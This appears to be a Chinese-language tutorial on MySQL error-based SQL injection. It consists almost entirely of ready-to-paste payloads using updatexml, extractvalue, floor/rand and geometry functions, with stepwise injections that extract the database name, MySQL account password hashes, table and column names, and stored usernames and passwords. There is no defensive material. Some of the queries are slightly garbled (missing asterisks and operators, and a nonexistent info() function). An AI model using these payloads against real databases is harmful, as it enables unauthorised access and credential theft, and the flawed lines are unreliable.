【网络安全】SQL注入--报错注入

报错注入定义

报错注入：利用sql语句的不规范，获取相关sql提示信息

代码展示

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() – #获取当前使用的库 1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database() #获取数据库敏感信息 1.floor() select * from test where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a); 2.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); 3.updatexml() select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 4.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 5.multipoint() select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6.polygon() select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); 7.multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8.linestring() select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9.multilinestring() select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10.exp() select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1 and info() --

2.获取mysql账号密码

1 and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1 and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) --

因为一条只能显示32字符，所以两段拼接则为mysql密码

3.获取表名

1and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

4.获取字段名

1and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=users LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

借助burpsuite

5.获取账号密码

1 and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --